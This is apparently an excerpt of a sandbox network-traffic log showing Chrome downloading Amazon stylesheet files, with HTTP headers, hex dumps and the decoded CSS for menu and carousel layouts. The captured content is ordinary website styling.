                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 28 30 2c 30 2c 30 2c 2e 38 29 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2e 68 6d 65 6e 75 2d 74 72 61 6e 73 69 74 69 6f 6e 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2e 68 6d 65 6e 75 2d 74 72 61 6e 73 69 74 69 6f 6e 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2e 68 6d 65 6e 75 2d 74 72 61 6e 73 69 74 69 6f 6e 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2e 68
                                                                                                                                                                                                                                                                Data Ascii: (0,0,0,.8)}#accountMenu-container #accountMenu-canvas-background.hmenu-transition,#accountMenu-container #hmenu-canvas-background.hmenu-transition,#hmenu-container #accountMenu-canvas-background.hmenu-transition,#hmenu-container #hmenu-canvas-background.h
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 67 72 6f 75 6e 64 20 2e 68 6d 65 6e 75 2d 63 6c 6f 73 65 2d 69 63 6f 6e 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 68 6d 65 6e 75 2d 63 6c 6f 73 65 2d 69 63 6f 6e 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 68 6d 65 6e 75 2d 63 6c 6f 73 65 2d 69 63 6f 6e 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 68 6d 65 6e 75 2d 63 6c 6f 73 65 2d 69 63 6f 6e 7b 72 69 67 68 74 3a 31 35 70 78 7d 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63
                                                                                                                                                                                                                                                                Data Ascii: ground .hmenu-close-icon,#accountMenu-container #hmenu-canvas-background .hmenu-close-icon,#hmenu-container #accountMenu-canvas-background .hmenu-close-icon,#hmenu-container #hmenu-canvas-background .hmenu-close-icon{right:15px}}#accountMenu-container #ac
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 33 31 61 32 32 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 2d 72 69 67 68 74 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 68 6f 6d 65 2d 72 69 67 68 74 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75
                                                                                                                                                                                                                                                                Data Ascii: tive{background-color:#131a22}#accountMenu-container #accountMenu-canvas #hmenu-customer-profile #hmenu-customer-profile-right,#accountMenu-container #accountMenu-canvas #hmenu-customer-profile #hmenu-home-right,#accountMenu-container #hmenu-canvas #hmenu
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 61 76 61 74 61 72 2d 69 6d 67 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 2d 6c 65 66 74 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 61 76 61 74 61 72 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 61 76 61 74 61 72 2d 69 6d 67 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 2d 6c 65 66 74 20 23
                                                                                                                                                                                                                                                                Data Ascii: enu-customer-avatar-img,#accountMenu-container #hmenu-canvas #hmenu-customer-profile #hmenu-customer-profile-left #hmenu-customer-avatar #hmenu-customer-avatar-img,#hmenu-container #accountMenu-canvas #hmenu-customer-profile #hmenu-customer-profile-left #
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 6d 65 2d 72 69 67 68 74 20 23 68 6d 65 6e 75 2d 68 6f 6d 65 2d 73 74 72 69 6e 67 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 2d 72 69 67 68 74 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 6e 61 6d 65 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 75 73 74 6f 6d 65 72 2d 70 72 6f 66 69 6c 65 20 23 68 6d 65 6e 75 2d 68 6f 6d 65 2d 72 69 67 68 74 20 23 68 6d 65 6e 75 2d 68 6f 6d 65 2d 73 74 72 69 6e 67 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20
                                                                                                                                                                                                                                                                Data Ascii: me-right #hmenu-home-string,#hmenu-container #accountMenu-canvas #hmenu-customer-profile #hmenu-customer-profile-right #hmenu-customer-name,#hmenu-container #accountMenu-canvas #hmenu-customer-profile #hmenu-home-right #hmenu-home-string,#hmenu-container
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 75 6c 20 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 37 34 37 35 61 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 75 6c 20 6c 69 3a 61 63 74 69 76 65 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d
                                                                                                                                                                                                                                                                Data Ascii: container #hmenu-canvas #hmenu-top-section ul li{list-style:none;margin-left:5px;flex-grow:1;text-align:center;background-color:#37475a}#accountMenu-container #accountMenu-canvas #hmenu-top-section ul li:active,#accountMenu-container #hmenu-canvas #hmenu-
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 65 6e 74 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 2c 23 61 63 63
                                                                                                                                                                                                                                                                Data Ascii: hmenu-container #hmenu-canvas #accountMenu-content,#hmenu-container #hmenu-canvas #hmenu-content{position:relative;overflow-x:hidden;height:100%;-webkit-overflow-scrolling:touch}#accountMenu-container #accountMenu-canvas #accountMenu-content ul.hmenu,#acc
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 75 2e 68 6d 65 6e 75 2d 76 69 73 69 62 6c 65 2c 23 68 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 68 6d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 2e 68 6d 65 6e 75 2d 76 69 73 69 62 6c 65 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 2e 68 6d 65 6e 75 2d 68 69 64 64 65 6e 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e
                                                                                                                                                                                                                                                                Data Ascii: u.hmenu-visible,#hmenu-container #hmenu-canvas #hmenu-content ul.hmenu.hmenu-visible{visibility:visible}#accountMenu-container #accountMenu-canvas #accountMenu-content ul.hmenu.hmenu-hidden,#accountMenu-container #accountMenu-canvas #hmenu-content ul.hmen
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 69 20 61 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 20 6c 69 20 61 3a 68 6f 76 65 72 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 20 6c 69 20 61 3a 76 69 73 69 74 65 64 2c 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 23 61 63 63 6f 75 6e 74 4d 65 6e 75 2d 63 61 6e 76 61 73 20 23 68 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 20 75 6c 2e 68 6d 65 6e 75 20 6c 69 20 61 2c 23 61 63 63 6f 75 6e 74 4d
                                                                                                                                                                                                                                                                Data Ascii: i a,#accountMenu-container #accountMenu-canvas #accountMenu-content ul.hmenu li a:hover,#accountMenu-container #accountMenu-canvas #accountMenu-content ul.hmenu li a:visited,#accountMenu-container #accountMenu-canvas #hmenu-content ul.hmenu li a,#accountM


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                29192.168.2.449862151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC609OUTGET /images/I/41945FR1dZL.css?AUIClients/AmazonGatewayAuiAssets&IaVMOKWd HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC673INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 18121
                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                X-Amz-IR-Id: d0dd6dd3-21c3-4d79-acda-f2615a29a313
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Jul 2024 22:29:19 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Mon, 18 Jul 2044 16:52:23 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1199039
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:24 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200083-IAD, cache-ewr18123-EWR
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 67 77 2d 73 70 69 6e 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 6d 2e 6d 65 64 69 61 2d 61 6d 61 7a 6f 6e 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 53 2f 73 61 73 68 2f 5a 55 72 57 70 30 70 66 34 32 76 63 61 65 6f 2e 67 69 66 29 20 35 30 25 20 35 30 25 20 6e 6f 2d 72 65 70 65 61 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 77 69 64 74 68 3a 37 30 70 78 3b 68 65 69 67 68 74 3a 37 30 70 78 7d 2e 67 77 2d 6c 6f 61 64 69 6e 67 2d 73 74 72 69 70 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 6d 2e 6d 65 64 69 61 2d 61 6d 61 7a 6f 6e 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f
                                                                                                                                                                                                                                                                Data Ascii: @charset "UTF-8";.gw-spinner{background:url(https://m.media-amazon.com/images/S/sash/ZUrWp0pf42vcaeo.gif) 50% 50% no-repeat;display:inline-block;vertical-align:top;width:70px;height:70px}.gw-loading-stripe{background:url(https://m.media-amazon.com/images/
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 72 69 67 68 74 3a 33 30 30 70 78 7d 23 73 71 75 69 73 68 65 64 2d 64 65 73 6b 74 6f 70 2d 72 6f 77 20 2e 64 65 73 6b 74 6f 70 2d 72 6f 77 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 32 30 70 78 20 73 6f 6c 69 64 20 23 45 33 45 36 45 36 7d 23 64 65 73 6b 74 6f 70 2d 61 64 2d 62 74 66 7b 68 65 69 67 68 74 3a 32 37 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 33 35 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 35 30 25 3b 77 69 64 74 68 3a 33 32 30 70 78 7d 2e 63 72 6f 70 70 65 64 2d 69 6d 61 67 65 2d 6d 61 70 2d 73 69 7a 65 20 61 72 65 61 7b 6f 75 74 6c 69 6e 65 3a 30 7d 2e 67 77 2d 63 6f 6c 20 2e 63
                                                                                                                                                                                                                                                                Data Ascii: right:300px}#squished-desktop-row .desktop-row{margin-bottom:0;border-right:20px solid #E3E6E6}#desktop-ad-btf{height:270px;margin-top:-135px;padding-left:20px;position:absolute;right:0;top:50%;width:320px}.cropped-image-map-size area{outline:0}.gw-col .c
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 67 77 2d 63 61 72 64 2d 6c 61 79 6f 75 74 20 2e 64 65 73 6b 74 6f 70 2d 72 6f 77 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 7d 2e 67 77 2d 63 61 72 64 2d 6c 61 79 6f 75 74 20 2e 64 65 73 6b 74 6f 70 2d 72 6f 77 3e 64 69 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 7d 2e 67 77 2d 63 61 72 64 2d 6c 61 79 6f 75 74 20 23 73 71 75 69 73 68 65 64 2d 64 65 73 6b 74 6f 70 2d 72 6f 77 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 31 30 70 78 7d 2e 67 77 2d 63 61 72 64 2d 6c 61 79 6f 75 74 20 23 73 71 75 69 73 68 65 64 2d 64 65 73 6b 74 6f 70 2d 72 6f 77 20 23 64 65 73 6b 74 6f 70 2d 61 64 2d 62 74 66 7b 72 69 67 68
                                                                                                                                                                                                                                                                Data Ascii: x;height:100%;margin-bottom:0}.gw-card-layout .desktop-row{margin-bottom:0;background:0 0}.gw-card-layout .desktop-row>div{background:#fff}.gw-card-layout #squished-desktop-row{padding-right:310px}.gw-card-layout #squished-desktop-row #desktop-ad-btf{righ
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 64 47 6c 76 62 6a 34 4b 49 43 41 67 50 43 39 79 5a 47 59 36 55 6b 52 47 50 67 6f 38 4c 33 67 36 65 47 31 77 62 57 56 30 59 54 34 4b 41 74 69 41 42 51 41 41 41 51 35 4a 52 45 46 55 4b 42 56 6a 59 43 41 52 4d 49 4c 55 39 2f 62 32 2f 70 38 36 61 54 4a 42 72 61 76 57 72 6d 45 41 61 33 6a 38 2b 4e 48 2f 6c 79 39 66 67 54 58 63 76 2f 65 59 59 65 71 30 69 51 79 50 37 6a 38 41 38 35 74 61 6d 68 6b 30 4e 44 58 42 62 42 4d 54 45 37 42 36 4d 41 65 5a 41 42 6d 67 4a 4b 38 41 78 6d 6c 70 61 66 2b 52 35 53 68 33 45 73 79 30 6b 70 49 53 73 4c 4f 4d 6a 49 30 59 4b 71 71 71 77 4d 4a 61 32 6c 6f 4d 4c 43 43 57 72 4b 77 63 69 74 74 57 72 31 72 2f 48 2b 59 48 53 32 74 72 42 6d 53 33 67 78 56 2b 2b 2f 37 74 2f 37 57 72 31 78 67 2b 66 50 6a 41 73 47 66 33 62 6f 5a 56 4b 31 61
                                                                                                                                                                                                                                                                Data Ascii: dGlvbj4KICAgPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4KAtiABQAAAQ5JREFUKBVjYCARMILU9/b2/p86aTJBravWrmEAa3j8+NH/ly9fgTXcv/eYYeq0iQyP7j8A85tamhk0NDXBbBMTE7B6MAeZABmgJK8Axmlpaf+R5Sh3Esy0kpISsLOMjI0YKqqqwMJa2loMLCCWrKwcittWr1r/H+YHS2trBmS3gxV++/7t/7Wr1xg+fPjAsGf3boZVK1a
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 6f 20 23 30 30 37 31 38 35 3b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 2d 32 70 78 7d 64 69 76 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 2d 76 69 65 77 70 6f 72 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 32 30 70 78 3b 5f 68 65 69 67 68 74 3a 32 32 30 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 30 7d 2e 66 65 65
                                                                                                                                                                                                                                                                Data Ascii: o #007185;outline-offset:-2px}div.feed-carousel{width:100%;margin:0 0 5px;position:relative;overflow:hidden}.feed-carousel .feed-carousel-viewport{width:100%;min-height:220px;_height:220px;white-space:nowrap;overflow:hidden;position:relative;margin:0}.fee
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 6c 65 66 74 2c 68 74 6d 6c 5b 64 61 74 61 2d 75 73 65 72 61 67 65 6e 74 2a 3d 22 20 54 72 69 64 65 6e 74 2f 22 5d 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 72 69 67 68 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 40 73 75 70 70 6f 72 74 73 20 28 2d 6d 73 2d 69 6d 65 2d 61 6c 69 67 6e 3a 61 75 74 6f 29 7b 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 6c 65 66 74 2c 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 72 69 67 68 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 6d 6f 7a 2d 62
                                                                                                                                                                                                                                                                Data Ascii: arousel .feed-left,html[data-useragent*=" Trident/"] .feed-carousel .feed-right{-webkit-border-radius:0;-moz-border-radius:0;border-radius:0}@supports (-ms-ime-align:auto){.feed-carousel .feed-left,.feed-carousel .feed-right{-webkit-border-radius:0;-moz-b
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 63 68 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2c 2e 61 2d 74 6f 75 63 68 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 73 63 72 6f 6c 6c 62 61 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 2d 6e 6f 2d 6a 73 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 2d 76 69 65 77 70 6f 72 74 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 73 63 72 6f 6c 6c 7d 2e 61 2d 6e 6f 2d 6a 73 20 2e 66 65 65 64 2d 73 63 72 6f 6c 6c 62 61 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 2d 6c 74 2d 69 65 38 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 2d 73 68 65 6c 66 7b 6f 76 65 72 66 6c 6f 77 3a 68 69
                                                                                                                                                                                                                                                                Data Ascii: ch .feed-carousel .feed-carousel-control,.a-touch .feed-carousel .feed-scrollbar{display:none}.a-no-js .feed-carousel .feed-carousel-viewport{overflow-x:scroll}.a-no-js .feed-scrollbar{display:none}.a-lt-ie8 .feed-carousel .feed-carousel-shelf{overflow:hi
                                                                                                                                                                                                                                                                2024-08-12 13:23:24 UTC1378INData Raw: 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 20 2e 61 73 2d 74 69 74 6c 65 2d 64 69 76 69 64 65 72 7b 63 6f 6c 6f 72 3a 23 44 44 44 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 2d 63 61 72 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 34 35 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 32 37 30 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 30 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 20 30 20 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 66 72 65 73 68 2d 73 68 6f 76 65 6c 65 72 20 2e 66 65 65 64 2d 63 61 72 6f 75 73 65 6c 20 2e 66 65 65 64 2d 63 61
                                                                                                                                                                                                                                                                Data Ascii: er{display:none}.fresh-shoveler .as-title-divider{color:#DDD}.fresh-shoveler .feed-carousel-card{text-align:center;min-width:145px;max-width:270px;max-height:200px;overflow:hidden;margin:0 10px 0 0;position:relative}.fresh-shoveler .feed-carousel .feed-ca
